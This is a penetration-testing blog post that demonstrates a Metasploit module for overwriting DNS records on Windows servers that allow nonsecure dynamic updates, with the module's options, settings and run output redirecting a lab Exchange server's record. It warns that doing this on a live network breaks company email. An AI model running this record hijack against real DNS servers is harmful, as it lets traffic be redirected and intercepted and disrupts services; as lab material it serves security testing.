“Secure” DNS updates is the default in Windows, but there is an option to allow “Nonsecure” updates. I have seen this changed when non-Windows DHCP servers are used (eg Access Points), this opens a network up to some pretty nifty attacks that a Metasploit module just hit the ground for.

The module was originally written by King Sabri, with many touch ups and the spoofing capability by busterbcook

You can read up on the pull request in pr/#8599

Just to drive home the point I’ll be using my Exchange server as a target:

You will break email for the entire company if you do this on a live network. Doing so is possibly a resume generating event.

If you are going to be overwriting an existing record make sure to keep a note of the real IP address of the host you are overwriting so that you can fix the record afterwards.

$ dig @ sdexchange.sittingduck.info

sdexchange.sittingduck.info. 1200 IN    A

Here is what the module looks like:

msf > use auxiliary/admin/dns/dyn_dns_update
msf auxiliary(dyn_dns_update) > show options

Module options (auxiliary/admin/dns/dyn_dns_update):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CHOST                      no        The source address to use for queries and updates
   DOMAIN                     yes       The domain name
   HOSTNAME                   yes       The name record you want to add
   IP                         no        The IP you want to assign to the record
   RHOST                      yes       The vulnerable DNS server IP address
   TYPE      A                yes       The record type you want to add. (Accepted: A, AAAA, CNAME, TXT)
   VALUE                      no        The string to be added with TXT or CNAME record

Auxiliary action:

   Name    Description
   ----    -----------
   UPDATE  Add or update a record. (default)

It has 3 different actions, but you’ll mostly want UPDATE. UPDATE will automatically delete a record if it exists already and then add the record back with your specified settings.

msf auxiliary(dyn_dns_update) > show actions

Auxiliary actions:

   Name    Description
   ----    -----------
   ADD     Add a new record. Fail if it already exists.
   DELETE  Delete an existing record.
   UPDATE  Add or update a record. (default)

Here are the settings I chose. Notice the IP address that I’m injecting isn’t on the same subnet as the domain.

msf auxiliary(dyn_dns_update) > set DOMAIN sittingduck.info
DOMAIN => sittingduck.info
msf auxiliary(dyn_dns_update) > set HOSTNAME sdexchange
HOSTNAME => sdexchange
msf auxiliary(dyn_dns_update) > set IP
IP =>
msf auxiliary(dyn_dns_update) > set RHOST

And the output:

msf auxiliary(dyn_dns_update) > run

[+] Found existing A record for sdexchange.sittingduck.info
[*] Sending dynamic DNS delete message...
[+] The record 'sdexchange.sittingduck.info =>' has been deleted!
[*] Sending dynamic DNS add message...
[+] The record 'sdexchange.sittingduck.info =>' has been added!
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) >

#Game Over

This will stay until fixed or another dynamic DNS update is performed from the original server (every 24 hours or so).